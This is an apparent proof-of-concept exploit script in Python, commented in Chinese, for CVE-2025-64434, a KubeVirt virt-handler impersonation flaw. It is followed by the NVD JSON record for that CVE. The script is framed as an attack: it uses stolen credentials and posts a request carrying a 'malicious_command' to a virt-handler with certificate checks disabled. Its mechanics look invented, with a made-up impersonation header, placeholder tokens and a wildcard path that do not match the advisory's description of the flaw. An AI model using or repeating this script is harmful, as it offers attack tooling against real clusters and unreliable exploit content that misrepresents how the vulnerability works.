CVE-2025-64434

# CVE-2025-64434 PoC - KubeVirt virt-handler身份验证绕过 # 攻击者需要先入侵一个virt-handler实例，然后利用共享凭证冒充virt-api import requests import json # 配置信息 VICTIM_VIRTHANDLER = "https://<victim-virthandler-ip>:8443" ATTACKER_VIRTHANDLER = "https://<attacker-virthandler-ip>:8443" KUBEVIRT_API = "https://kubevirt-api:443" # 步骤1: 获取被入侵virt-handler的凭证 def get_stolen_credentials(): """ 假设攻击者已通过其他漏洞入侵了一个virt-handler实例 从中提取共享的服务账户凭证 """ # 实际场景中从被入侵的virt-handler获取 return { 'token': 'stolen_service_account_token', 'ca_cert': 'path_to_ca_cert' } # 步骤2: 构造冒充virt-api的请求 def craft_impersonation_request(credentials): """ 利用共享凭证构造冒充virt-api的恶意请求 目标是对其他virt-handler执行特权操作 """ headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {credentials["token"]}', 'X-Virt-Api-Impersonation': 'true' # 伪装标记 } # 构造恶意请求 - 尝试触发虚拟机操作 payload = { 'action': 'trigger_vm_migration', 'target_virthandler': 'https://target-virthandler:8443', 'vm_id': 'target-vm-uuid', 'malicious_command': 'whoami' } return headers, payload # 步骤3: 发送恶意请求 def exploit(headers, payload): """ 向目标virt-handler发送冒充请求 由于verifyPeerCert验证缺陷，请求可能被信任 """ target_url = f"{VICTIM_VIRTHANDLER}/apis/kubevirt.io/v1/namespaces/*/virtualmachineinstances/*" response = requests.post(target_url, headers=headers, json=payload, verify=False) return response # 主函数 if __name__ == "__main__": print("CVE-2025-64434 KubeVirt virt-handler Impersonation PoC") credentials = get_stolen_credentials() headers, payload = craft_impersonation_request(credentials) response = exploit(headers, payload) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}")

{"cve": {"id": "CVE-2025-64434", "sourceIdentifier": "[email protected]", "published": "2025-11-07T23:15:45.690", "lastModified": "2025-11-25T17:05:28.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."}, {"lang": "es", "value": "KubeVirt es un complemento de gestión de máquinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la lógica de verificación de pares en virt-handler (a través de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podría explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la máquina virtual gestionada por esta. Esta vulnerabilidad está corregida en las versiones 1.5.3 y 1.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "1.5.3", "matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*", "matchCriteriaId": "78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C"}]}]}], "references": [{"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}